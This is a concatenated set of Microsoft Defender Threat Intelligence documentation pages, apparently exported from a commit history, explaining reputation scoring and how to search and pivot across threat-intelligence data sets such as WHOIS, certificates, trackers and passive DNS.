-Select the **Help** icon in the upper right-hand corner of the Defender portal. The side panel displays a search bar where you can type your problem or support question.
--
-You can also review MicrosoftΓÇÖs [licensing resources](https://www.microsoft.com/licensing/docs) and [privacy statement](https://privacy.microsoft.com/privacystatement) by selecting **Legal** and **Privacy & Cookies**, respectively, at the lower right hand of the **Help** side panel.
-
-## Sign out of the Defender portal
-
-1. Select the **My account** icon in the upper right-hand corner of the Defender portal.
-2. Select **Sign out**.
--
-## Clean up resources
-There are no resources to clean up in this section.
-
-### See also
--- [What is Microsoft Defender Threat Intelligence (Defender TI)?](index.md)
threat-intelligence Reputation Scoring https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/reputation-scoring.md
-
Title: 'Microsoft Defender Threat Intelligence (Defender TI) Reputation Scoring'
-description: 'In this overview article, learn about the Microsoft Defender Threat Intelligence (Defender TI)ΓÇÖs reputation scoring feature.'
----- Previously updated : 08/02/2022---
-# Reputation scoring
-
-Microsoft Defender Threat Intelligence (Defender TI) provides proprietary reputation scores for any Host, Domain, or IP Address. Whether validating the reputation of a known or unknown entity, this score helps users quickly understand any detected ties to malicious or suspicious infrastructure. The platform provides quick information about the activity of these entities (e.g. First and Last Seen timestamps, ASN, associated infrastructure) and a list of rules that impact the reputation score when applicable.
-
-Reputation data is important to understanding the trustworthiness of your own attack surface and is also useful when assessing unknown hosts, domains or IP addresses that appear in investigations. These scores will uncover any prior malicious or suspicious activity that impacted the entity, or other known indicators of compromise that should be considered.
-
-![Reputation Edge Screenshot](media/reputationEdgeScreenshot.png)
-## Understanding reputation scores
-
-Reputation Scores are determined by a series of algorithms designed to quickly quantify the risk associated with an entity. We develop Reputation Scores based on our proprietary data by leveraging our crawling infrastructure, as well as IP information collected from external sources.
-
-![Reputation Summary Card](media/reputationSummaryCard.png)
-
-## Detection methods
-Reputation Scores are determined by a series of factors, including known associations to blocklisted entities and a series of machine learning rules used to assess risk.
-
-## Scoring brackets
-Reputation Scores are displayed as a numerical score with a range from 0 to 100. An entity with a score of ΓÇ£0ΓÇ¥ has no known associations to suspicious activity or known indicators of compromise; a score of ΓÇ£100ΓÇ¥ indicates that the entity is malicious. Hosts, Domains, and IP Addresses are grouped into the following categories depending on their numerical score:
-
-| Score | Category | Description |
-|--|||
-| 75+ | Malicious | The entity has confirmed associations to known malicious infrastructure that appears on our blocklist and matches machine learning rules that detect suspicious activity. |
-| 50 ΓÇô 74 | Suspicious | The entity is likely associated to suspicious infrastructure based on matches to three or more machine learning rules. |
-| 25 ΓÇô 49 | Neutral | The entity matches at least two machine learning rules. |
-| 0 ΓÇô 24 | Unknown (Green) | If the score is ΓÇ£UnknownΓÇ¥ and green, the entity has returned at least one matched rule. |
-| 0 ΓÇô 24 | Unknown (Grey) | If the score is ΓÇ£UnknownΓÇ¥ and grey, the entity has not returned any rule matches. |
-
-## Detection rules
-
-Reputation scores are based on many factors that an analyst may reference to determine the relative quality of a domain or address. These factors are reflected in the machine learning rules that comprise the reputation scores. For example, ΓÇ£.xyzΓÇ¥ or ΓÇ£.ccΓÇ¥ top-level domains (TLDs) are generally more suspicious than ".comΓÇ¥ or ΓÇ£.orgΓÇ¥ TLDs. An ASN (Autonomous System Number) hosted by a low-cost or free hosting provider is more likely to be associated with malicious activity, as would a self-signed SSL certificate. This reputation model was developed by looking at relative occurrences of these features among both malicious and benign indicators to score the overall reputation of an entity.
-
-Please refer to the list below for examples of rules used to determine the suspiciousness of a host, domain, or IP address. Please note that this list is not comprehensive and is constantly changing; our detection logic and consequent capabilities are dynamic as they reflect the evolving threat landscape. For this reason, we do not publish a comprehensive list of the machine learning rules used to assess an entityΓÇÖs reputation.
-
-See the example reputation scoring rules below:
-
-| Rule Name | Description |
-||--|
-| SSL-Certificate Self-Signed | Self-signed certificates may indicate malicious behavior |
-| Tagged as Malicious | Tagged as malicious by a member within your organization |
-| Web components observed | The number of web components observed may indicate maliciousness |
-| Name server | Domain is using a name server that is more likely to be used by malicious infrastructure |
-| Registrar | Domains registered with this registrar are more likely to be malicious |
-| Registrant email provider | Domain is registered with an email provider that is more likely to register malicious domains |
-
-It is important to remember that these factors must be assessed holistically to make an accurate assessment on the reputation of an entity. The specific combination of indicators, rather than any individual indicator, can predict whether an entity is likely to be malicious or suspicious.
-
-## Severity
-
-When creating rules for the machine learning detection system, a severity rating is applied to it. Each rule is assigned ΓÇ£HighΓÇ¥, ΓÇ£MediumΓÇ¥ or ΓÇ£LowΓÇ¥ severity based on the level of risk associated with the rule.
-
-## Use cases
-
-### Incident triage, response and threat hunting
-Defender TIΓÇÖs reputation score, classification, rules, and description of rules can be used to quickly assess if an IP address or domain indicator is good, suspicious, or malicious. Other times, we may not have observed enough infrastructure associated with an IP address or domain to infer if the indicator is good or bad. If an indicator has an unknown or neutral classification, users are encouraged to perform a deeper investigation by reviewing our data sets to infer if the indicator is good or bad. If an indicatorΓÇÖs reputation includes an article association, users are encouraged to review those listed article(s) to learn more about how the indicator is linked to a potential threat actorΓÇÖs campaign, what industries or nations they may be targeting, associated TTPs, and identify other related indicators of compromise to broaden the scope of the incidentΓÇÖs response and hunting efforts.
-
-### Intelligence gathering
-
-Any associated articles can be shared with the analystΓÇÖs cyber threat intelligence team, so they have a clearer understanding of who may be targeting their organization.
-
-## Next steps
-For more information, see [Analyst insights](analyst-insights.md).
threat-intelligence Searching And Pivoting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/searching-and-pivoting.md
-
Title: 'Searching &amp; pivoting with Microsoft Defender Threat Intelligence (Defender TI)'
-description: 'Learn how to search and pivot across internet data sets, threat articles, vulnerability articles, and projects using Microsoft Defender Threat Intelligence (Defender TI).'
----- Previously updated : 08/02/2022---
-# Searching and pivoting
-
-Microsoft Defender Threat Intelligence (Defender TI) offers a robust and flexible search engine to streamline the investigation process. The platform is designed to allow users to pivot across a wide variety of indicators from different data sources, making it easier than ever to discover relationships between disparate infrastructure. This article will help users understand how to conduct a search and pivot across different data sets to discover relationships between different artifacts.
-
-![Search HomePage Chrome Screenshot](media/searchHomePageChromeScreenshot.png)
-
-## Prerequisites
--- A Microsoft Entra ID or personal Microsoft account. [Login or create an account](https://signup.microsoft.com/)-- A Microsoft Defender Threat Intelligence (Defender TI) Premium license.
- > [!Note]
- > Users without a Defender TI Premium license will still be able to log into the Defender Threat Intelligence Portal and access our free Defender TI offering.
-
-## Open Defender TIΓÇÖs Threat Intelligence Home Page
-
-1. Access the [Defender Threat Intelligence Portal](https://ti.defender.microsoft.com/).
-2. Complete Microsoft authentication to access portal.
-
-## Performing threat intelligence searches and pivots
-
-Defender TIΓÇÖs Threat Intelligence search is both simple and powerful, designed to surface immediate key insights while also allowing users to directly interact with the datasets that comprise these insights. The search bar supports a wide variety of different inputs; users can search for specific artifacts as well as Article or Project names.
-
-### Search artifact types
-1. **IP address:** Search ΓÇÿ195.161.141[.]65ΓÇÖ in the Threat Intelligence Search bar. This action results in an IP Address search.
-
- ![Search Ip Address](media/searchIpAddress.png)
-
-2. **Domain:** Search `fabrikam.com` in the Threat Intelligence Search bar. This action results in a Domain search.
-
- ![Search Domain](media/searchDomain.png)
-
-3. **Host:** Search `canary.fabrikam.com` in the Threat Intelligence Search bar. This action results in a Host search.
-
- ![Search Host](media/searchHost.png)
-
-4. **Keyword:** Search ΓÇÿapt29ΓÇÖ in the Threat Intelligence Search bar. This action results in a Keyword search. Keyword searches cover any type of keyword, which may include a term, email address, etc. Keyword searches result in associations with articles, projects, as well as data sets.
-
- ![Search Keyword](media/searchKeyword.png)
-
-5. **CVE-ID:** Search ΓÇÿCVE-2021-40444ΓÇÖ in the Threat Intelligence Search bar. This action results in a CVE-ID Keyword search.
-
-6. **Article:** Search ΓÇÿCommodity Skimming & Magecart Trends in First Quarter of 2022ΓÇÖ in the Threat Intelligence Search bar. This action results in an Article search.
-
- ![Search Ti Article](media/searchTiArticle.png)
-
-7. **Tag:** Select ΓÇÿTagΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿmagecartΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Tag search.
-
- > [!NOTE]
- > This does not return articles that share that tag value.
-
- ![Search Tag](media/searchTag.png)
-
-8. **Component:** Select ΓÇÿComponentΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿcobalt strikeΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Component search.
-
- ![Search Component](media/searchComponent.png)
-
-9. **Tracker:** Select ΓÇÿTrackersΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿ07d14d16d21d21d00042d41d00041d47e4e0ae17960b2a5b4fd6107fbb0926ΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Tracker search. Note: In this example, this was a JarmHash Tracker type.
-
- > [!NOTE]
- > In this example, this was a JarmHash Tracker type.
-
- ![Search Trackers](media/searchTrackers.png)
-
-10. **WHOIS Email:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿEmailΓÇÖ from the Threat Intelligence Search drop-down and type in domains@microsoft.com in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS Email search.
-
- ![Search Whois Email](media/searchWhoisEmail.png)
-
-11. **WHOIS Name:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿNameΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿMSN HostmasterΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS Name search.
-
- ![Search Whois Name](media/searchWhoisName.png)
-
-12. **WHOIS Organization:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿOrganizationΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿMicrosoft CorporationΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS Organization search.
-
- ![Search Whois Organization](media/searchWhoisOrganization.png)
-
-13. **WHOIS Address:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿAddressΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿOne Microsoft WayΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS Address search.
-
- ![Search Whois Address](media/searchWhoisAddress.png)
-
-14. **WHOIS City:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿCityΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿRedmondΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS City search.
-
- ![Search Whois City](media/searchWhoisCity.png)
-
-15. **WHOIS State:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿStateΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿWAΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS State search.
-
- ![Search Whois State](media/searchWhoisState.png)
-
-16. **WHOIS Postal Code:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿPostal CodeΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿ98052ΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS Postal Code search.
-
- ![Search Whois Postal Code](media/searchWhoisPostalCode.png)
-
-17. **WHOIS Country:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿCountryΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿUSΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS Country/region search.
-
- ![Search Whois Country](media/searchWhoisCountry.png)
-
-18. **WHOIS Phone:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿPhoneΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿ+1.4258828080ΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS Phone search.
-
- ![Search Whois Phone](media/searchWhoisPhone.png)
-
-19. **WHOIS Nameserver:** Select ΓÇÿWHOISΓÇÖ > ΓÇÿNameserverΓÇÖ from the Threat Intelligence Search drop-down and type in `ns1-03.azure-dns.com` in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a WHOIS Nameserver search.
-
- ![Search Whois Name server](media/searchWhoisNameserver.png)
-
-20. **Certificate SHA-1:** Select ΓÇÿCertificateΓÇÖ > ΓÇÿSHA-1ΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿ35cd04a03ef86664623581cbd56e45ed07729678ΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Certificate SHA-1 search.
-
- ![Search Certificate Sha1](media/searchCertificateSha1.png)
-
-21. **Certificate Serial Number:** Select ΓÇÿCertificateΓÇÖ > ΓÇÿSerial NumberΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿ1137354899731266880939192213383415094395905558ΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Certificate Serial Number search.
-
- ![Search Certificate Serial Number](media/searchCertificateSerialNumber.png)
-
-22. **Certificate Issuer Common Name:** Select ΓÇÿCertificateΓÇÖ > ΓÇÿIssuer Common NameΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿMicrosoft Azure TLS Issuing CA 05ΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Certificate Issuer Common Name search.
-
- ![Search Certificate Issuer CommonName](media/searchCertificateIssuerCommonName.png)
-
-23. **Certificate Issuer Alternative Name:** Select ΓÇÿCertificateΓÇÖ > ΓÇÿIssuer Alternative NameΓÇÖ from the Threat Intelligence Search drop-down and type in a certificate issuer alternative name in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Certificate Issuer Alternative Name search.
-
-24. **Certificate Subject Common Name:** Select ΓÇÿCertificateΓÇÖ > ΓÇÿSubject Common NameΓÇÖ from the Threat Intelligence Search drop-down and type in `*.oneroute.microsoft.com` in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Certificate Subject Common Name search.
-
- ![Search Certificate Subject CommonName](media/searchCertificateSubjectCommonName.png)
-
-25. **Certificate Subject Alternative Name:** Select ΓÇÿCertificateΓÇÖ > ΓÇÿSubject Alternative NameΓÇÖ from the Threat Intelligence Search drop-down and type in `oneroute.microsoft.com` in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Certificate Subject Alternative Name search.
-
- ![Search Certificate Subject Alternative Name](media/searchCertificateSubjectAlternativeName.png)
-
-26. **Cookie Name:** Select ΓÇÿCookieΓÇÖ > ΓÇÿNameΓÇÖ from the Threat Intelligence Search drop-down and type in ΓÇÿARRAffinityΓÇÖ in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Cookie Name search.
-
- ![Search Cookie Name](media/searchCookieName.png)
-
-27. **Cookie Domain:** Select ΓÇÿCookieΓÇÖ > ΓÇÿDomainΓÇÖ from the Threat Intelligence Search drop-down and type in `portal.fabrikam.com` in the Threat Intelligence Search bar. Press Enter or select the right-hand arrow to perform the search. This action results in a Cookie Domain search.
-
- ![Search Cookie Domain](media/searchCookieDomain.png)
-
-28. **Pivots:** For any of the searches performed in the steps above, there are artifacts with hyperlinks that you can pivot off to discover further enriched results associated with those indicators. Feel free to experiment with this on your own.
-
-## Search results
-
-### Key insights
-
-At the top of the page, the platform provides some basic information about the artifact. This information can include the following, depending on the artifact type:
--- **Country:** the flag next to the IP Address indicates the country/region of origin for the artifact, which can help determine its reputability or security posture. This IP Address is hosted on infrastructure within the United States.-- **Reputation:** in this example, the IP Address is tagged with ΓÇ£MaliciousΓÇ¥ which indicates that the platform has detected connections between this artifact and known advisory infrastructure. Artifacts can also be tagged ΓÇ£SuspiciousΓÇ¥, ΓÇ£NeutralΓÇ¥ or ΓÇ£UnknownΓÇ¥.-- **First Seen:** this timestamp indicates when the artifact was first observed by the platformΓÇÖs detection system. Understanding the lifespan of an artifact can help determine its reputability.-- **Last Seen:** this timestamp indicates when the artifact was last observed by the platformΓÇÖs detection system. This helps determine whether the artifact is still actively used.-- **IP Block:** the IP block that includes the queried IP address artifact.-- **Registrar:** the registrar associated to the WHOIS record for the queried domain artifact.-- **Registrant:** the name of the registrant within the WHOIS data for an artifact.-- **ASN:** the ASN associated with the artifact.-- **OS:** the operating system associated with the artifact.-- **Host:** the hosting provider for the artifact. Some hosting providers are more reputable than others, so this value can help indicate the validity of an artifact.-
-![Search IP Key Insights](media/searchIPKeyInsights.png)
-
-This section also shows any tags applied to the artifact or any projects that include it. Users can also add a tag or add the artifact to a project.
-
-## Summary tab
-
-### Overview
-
-The results of a Threat Intelligence search are grouped into two tabs: ΓÇ£SummaryΓÇ¥ and ΓÇ£Data.ΓÇ¥ The Summary tab provides key insights about an artifact that the platform has derived from our expansive datasets. This section is designed to surface key findings that can help kickstart an investigation.
-
-### Reputation
-
-Defender TI provides proprietary reputation scores for any Host, Domain, or IP Address. Whether validating the reputation of a known or unknown entity, this score helps users quickly understand any detected ties to malicious or suspicious infrastructure. Reputation Scores are displayed as a numerical score with a range from 0 to 100. An entity with a score of ΓÇ£0ΓÇ¥ has no known associations to suspicious activity or known indicators of compromise; a score of ΓÇ£100ΓÇ¥ indicates that the entity is malicious.
-The platform provides a list of rules with a description and severity rating. In the example below, we see four ΓÇ£high severityΓÇ¥ rules that are applicable to this domain.
-
-For more information, see [Reputation scoring](reputation-scoring.md).
-
-![Summary Tab Reputation](media/summaryTabReputation.png)
-
-### Analyst insights
-
-The Analyst Insights section provides quick insights about the artifact that may help determine the next step in an investigation. This section will list any insights that apply to the artifact and those that do not apply for additional visibility. In the below example, we can quickly determine that the IP Address is routable, hosts a web server, and had an open port within the past five days. Furthermore, the system displays rules that were not triggered, which can be equally helpful when kickstarting an investigation.
-
-For more information, see [Analyst insights](analyst-insights.md).
-
-![Summary Tab Analyst Insights](media/summaryTabAnalystInsights.png)
-
-### Articles
-
-The Articles section displays any articles that may provide insight on how to best investigate and ultimately disarm the impacted artifact. These articles are written by researchers who study the behavior of known threat actors and their infrastructure, surfacing key findings that can help others mitigate risk to their organization. In this example, the searched IP Address has been identified as an IOC that relates to the findings within the article.
-
-For more information, see [What is Microsoft Defender Threat Intelligence (Defender TI)?](index.md)
-
-![Summary Tab Articles](media/summaryTabArticles.png)
-
-### Services
-
-This section lists any detected services running on the IP address artifact. This is helpful when trying to understand the intended use of the entity. When investigating malicious infrastructure, this information can help determine the capabilities of an artifact, enabling users to proactively defend their organization based on this information
-
-![Summary Tab Services](media/summaryTabServices.png)
-
-### Resolutions
-
-Resolutions are individual DNS records captured using passive sensors distributed throughout the world. These values reveal a history of how a Domain or IP address changes infrastructure over time. They can be used to discover additional infrastructure and measure risk based on levels of connection. For each resolution, we provide ΓÇ£first seenΓÇ¥ and ΓÇ£last seenΓÇ¥ timestamps to showcase the lifecycle of the resolutions.
-
-![Summary Tab Re solutions](media/summaryTabResolutions.png)
-
-### Certificates
-
-Beyond securing your data, SSL Certificates are a fantastic way for users to connect disparate network infrastructure. SSL certificates can make connections that passive DNS or WHOIS data may miss. This means more ways of correlating potential malicious infrastructure and identifying potential operational security failures of actors. For each SSL certificate, we provide the certificate name, expiration date, subject common name, and subject organization name.
-
-![Summary Tab Certificates](media/summaryTabCertificates.png)
-
-### Projects
-
-The Defender TI platform allows users to create projects for organizing indicators of interest or compromise from an investigation. Projects are also created to monitor connecting artifacts for improved visibility. Projects contain a listing of all associated artifacts and a detailed history that retains the names, descriptions, collaborators, and monitoring profiles.
-
-When a user searches an IP address, domain, or host, if that indicator is listed within a project the user has access to, the user can select the Projects tab and navigate to the details of the project for more context about the indicator before reviewing the other data sets for more information.
-
-For more information, see [Using projects](using-projects.md).
-
-![Summary Tab Projects](media/summaryTabProjects.png)
--
-## Data tab
-
-### Overview
-
-The Data tab helps users deep-dive into the tangible connections observed by the Defender TI platform. While the Summary tab surfaces key findings to provide immediate context about an artifact, the Data tab enables analysts to study these connections much more granularly. Users can click on any returned value to pivot across any related metadata.
-
-![Data Sets Edge Screenshot](media/dataSetsEdgeScreenshot.png)
-
-### Data types
-
-The following datasets are available in Defender TI:
--- Resolutions-- WHOIS-- Certificates-- Trackers-- Subdomains-- Components-- Host Pairs-- Cookies-- Services-- DNS-- Reverse DNS-
-These separate datasets will appear in separate tabs after submitting a search. The results are clickable, enabling a user to quickly pivot across related infrastructure to unveil insights that may have been missed with traditional investigative methods.
-
-### Resolutions
-
-Passive DNS is a system of record that stores DNS resolution data for a given location, record, and timeframe. This historical resolution data set allows users to view which domains resolved to an IP address and vice versa. This data set allows for time-based correlation based on domain or IP overlap.
-
-PDNS may enable the identification of previously unknown or newly stood-up threat actor infrastructure. Proactive addition of indicators to blocklists can cut off communication paths before campaigns take place. Users will find A record resolution data within the Resolutions data set tab and will find more types of DNS records in the DNS data set tab.
-
-Our PDNS resolution data includes the following:
-- **Resolve:** the name of the resolving entity (either an IP Address or Domain)-- **Location:** the location the IP address is hosted in.-- **Network:** the netblock or subnet associated with the IP address.-- **ASN:** the autonomous system number and organization name-- **First Seen:** a timestamp that displays the date that we first observed this resolution.-- **Last Seen:** a timestamp that displays the date that we last observed this resolution.-- **Source:** the source that enabled the detection of the relationship.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Re solutions](media/dataTabResolutions.png)
-
-### WHOIS
-
-WHOIS is a protocol that lets anyone query information about the ownership of a domain, IP address, or subnet. One of the most common functions for WHOIS in threat infrastructure research is to identify or connect disparate entities based on unique data shared within WHOIS records.
-
-Each WHOIS record has several different sections, all of which could include different information. Commonly found sections include ΓÇ£registrarΓÇ¥, ΓÇ£registrantΓÇ¥, ΓÇ£administratorΓÇ¥, and ΓÇ£technicalΓÇ¥ with each potentially corresponding to a different contact for the record. A lot of the time this data is duplicated across sections, but in some cases, there may be slight discrepancies, especially if an actor made a mistake. When viewing WHOIS information within Defender TI, you will see a condensed record that de-duplicates any data and notates which part of the record it came from.
-
-Users can also view historic WHOIS records to understand how the registration data has changed over time.
-
-Our WHOIS data includes the following:
--- **Record Updated:** a timestamp that indicates the day a WHOIS record was last updated.-- **Last Scanned:** the date that the Defender TI system last scanned the record.-- **Expiration:** the expiration date of the registration, if available.-- **Created:** the age of the current WHOIS record.-- **WHOIS Server:** the server is set up by an ICANN accredited registrar to acquire up-to-date information about domains that are registered within it.-- **Registrar:** the registrar service used to register the artifact.-- **Domain Status:** the current status of the domain. An ΓÇ¥active" domain is live on the internet.-- **Email:** any email addresses found in the WHOIS record, and the type of contact each one is associated with (e.g. admin, tech).-- **Name:** the name of any contacts within the record, and the type of contact each is associated with.-- **Organization:** the name of any organizations within the record, and the type of contact each is associated with.-- **Street:** any street addresses associated to the record, and the type of contact it is associated with.-- **City:** any city listed in an address associated to the record, and the type of contact it is associated with.-- **State:** any states listed in an address associated to the record, and the type of contact it is associated with.-- **Postal Code:** any postal codes listed in an address associated with the record, and the type of contact it is associated with.-- **Country:** any countries/regions listed in an address associated to the record, and the type of contact it is associated with.-- **Phone:** any phone numbers listed in the record, and the type of contact it is associated with.-- **Name Servers:** any name servers associated with the registered entity.-
-![Data Tab WHOIS](media/dataTabWHOIS.png)
-
-### Certificates
-
-Beyond securing your data, SSL Certificates are a fantastic way for users to connect disparate network infrastructure. Modern scanning techniques allow us to perform data requests against every node on the Internet in a matter of hours, meaning we can easily associate a certificate to an IP address hosting it on a regular basis.
-
-Much like a WHOIS record, SSL certificates require information to be supplied by the user to generate the final product. Aside from the domain, the SSL certificate is being created for (unless self-signed), any of the additional information can be made up by the user. Where our users see the most value from SSL certificates is not necessarily the unique data someone may use when generating the certificate, but where it's hosted.
-
-What makes SSL certificates more valuable is that they can make connections that passive DNS or WHOIS data may miss. This means more ways of correlating potential malicious infrastructure and identifying potential operational security failures of actors. Microsoft has collected over 30 million certificates from 2013 until the present day and provides users with the tools to make correlations on certificate content and history.
-
-Our certificate data includes the following:
--- **Sha1:** The SHA1 algorithm hash for an SSL Cert asset.-- **First Seen:** a timestamp that displays the date that we first observed this certificate on an artifact.-- **Last Seen:** a timestamp that displays the date that we last observed this certificate on an artifact.-- **Infrastructure:** any related infrastructure associated with the certificate.-
-![Data Tab Certificates List](media/dataTabCertificatesList.png)
-
-When a user clicks on a Sha1 hash, the user will be able to see details about the certificate in the right-hand pane, which includes:
--- **Serial Number:** The serial number associated with an SSL certificate.-- **Issued:** The date when a certificate was issued.-- **Expires:** The date when a certificate will expire.-- **Subject Common Name:** The Subject Common Name for any associated SSL Certs.-- **Issuer Common Name:** The Issuer Common Name for any associated SSL Certs.-- **Subject Alternative Name(s):** Any alternative common names for the SSL Cert.-- **Issuer Alternative Name(s):** Any additional names of the issuer.-- **Subject Organization Name:** The organization linked to the SSL certificate registration.-- **Issuer Organization Name:** The name of the organization that orchestrated the issue of a certificate.-- **SSL Version:** The version of SSL that the certificate was registered with.-- **Subject Organization Unit:** Optional metadata that indicates the department within an organization that is responsible for the certificate.-- **Issuer Organization Unit:** Additional information about the organization issuing the certificate.-- **Subject Street Address:** The street address where the organization is located.-- **Issuer Street Address:** The street address where the issuer organization is located.-- **Subject Locality:** The city where the organization is located.-- **Issuer Locality:** The city where the issuer organization is located.-- **Subject State/Province:** The state or province where the organization is located.-- **Issuer State/Province:** The state or province where the issuer organization is located.-- **Subject Country:** The country/region where the organization is located.-- **Issuer Country:** The country/region where the issuer organization is located.-- **Related Infrastructure:** any related infrastructure associated with the certificate.-
-![Data Tab Certificate Details](media/dataTabCertificateDetails.png)
-
-### Subdomains
-
-A subdomain is an internet domain, which is part of a primary domain. Subdomains are also referred to as "hosts". As an example, `learn.microsoft.com` is a subdomain of `microsoft.com`. For every subdomain, there could be a new set of IP addresses to which the domain resolves to and this can be a great data source for finding related infrastructure.
-
-Our subdomain data includes the following:
--- **Hostname:** the subdomain associated with the domain that was searched.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Sub domains](media/dataTabSubdomains.png)
-
-### Trackers
-
-Trackers are unique codes or values found within web pages and often used to track user interaction. These codes can be used to correlate a disparate group of websites to a central entity. Often, actors will copy the source code of a victimΓÇÖs website they are looking to impersonate for a phishing campaign. Seldomly will actors take the time to remove these IDs that allow users to identify these fraudulent sites using our Trackers data sets.
-
-MicrosoftΓÇÖs Tracker data set includes IDs from providers like Google, Yandex, Mixpanel, New Relic, Clicky, and is continuing to grow on a regular basis.
-
-Our tracker data includes the following:
--- **Hostname:** the hostname that hosts the infrastructure where the tracker was detected.-- **First Seen:** a timestamp that displays the date that we first observed this tracker on the artifact.-- **Last Seen:** a timestamp that displays the date that we last observed this tracker on the artifact.-- **Type:** the type of tracker that was detected (e.g. GoogleAnalyticsID, JarmHash).-- **Value:** the identification value for the tracker.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Trackers](media/dataTabTrackers.png)
-
-### Components
-
-Web components are details describing a web page or server infrastructure gleaned from Microsoft performing a web crawl or scan. These components allow a user to understand the makeup of a webpage or the technology and services driving a specific piece of infrastructure.
-
-Pivoting on unique components can find actors' infrastructure or other sites that are compromised. Users can also understand if a website might be vulnerable to a specific attack or compromise based on the technologies that it is running.
-
-Our component data includes the following:
--- **Hostname:** the hostname that hosts the infrastructure where the component was detected.-- **First Seen:** a timestamp of the date that we first observed this component on the artifact.-- **Last Seen:** a timestamp of the date that we last observed this component on the artifact.-- **Category:** the type of component that was detected (e.g. Operating System, Framework, Remote Access, Server).-- **Name + Version:** the component name and the version running on the artifact (e.g. Microsoft IIS (v8.5).-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Components](media/dataTabComponents.png)
-
-### Host pairs
-
-Host pairs are two pieces of infrastructure (a parent and a child) that share a connection observed from a MicrosoftΓÇÖs virtual userΓÇÖs web crawl. The connection could range from a top-level redirect (HTTP 302) to something more complex like an iframe or script source reference.
-
-Our host pair data includes the following:
--- **Parent Hostname:** the hostname that redirects or otherwise connects to any child hostnames.-- **Child Hostname:** the hostname that connects to the parent hostname. This value is the result of a redirect or other more complex connection.-- **First Seen:** the date that we first observed this host pair relationship on the artifact.-- **Last Seen:** the date that we last observed this host pair relationship on the artifact.-- **Cause:** the type of connection between the parent and child hostname. Potential causes include redirects, img.src, css.import or script.src connections.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Host Pairs](media/dataTabHostPairs.png)
--
-### Cookies
-
-Cookies are small pieces of data sent from a server to a client as the user browses the internet. These values sometimes contain a state for the application or little bits of tracking data. We highlight and index cookie names observed when crawling a website and allow users to dig into everywhere the system has observed specific cookie names across its crawling and data collection.
-
-Our cookie data includes the following:
--- **Hostname:** the host infrastructure that is associated with the cookie.-- **First Seen:** a timestamp of the date that we first observed this cookie on the artifact.-- **Last Seen:** a timestamp of the date that we last observed this cookie on the artifact.-- **Name:** the name of the cookie (e.g. JSESSIONID, SEARCH_NAMESITE).-- **Domain:** the domain associated with the cookie.-- **Tags:** any tags applied to this artifact in the Defender TI system.-
-![Data Tab Cookies](media/dataTabCookies.png)
-
-### Services
-Service names and port numbers are used to distinguish between different services that run over transport protocols such as TCP, UDP, DCCP, and SCTP. Port numbers can suggest what type of application is running on a particular port. But applications or services can be changed to use a different port to obfuscate or hide the service or application on an IP address. Knowing the port and header/banner information can identify the true application/service and the combination of ports being used. Defender TI surfaces 14 days of history within the Services tab, displaying the last banner response associated with a port observed.
-
-Our Services data includes the following:
--- Open ports observed-- Port numbers-- Components-- Number of times the service was observed-- When the port was last scanned-- Protocol connection-- Status of the port
- - Open
- - Filtered
- - Closed
-- Banner response-
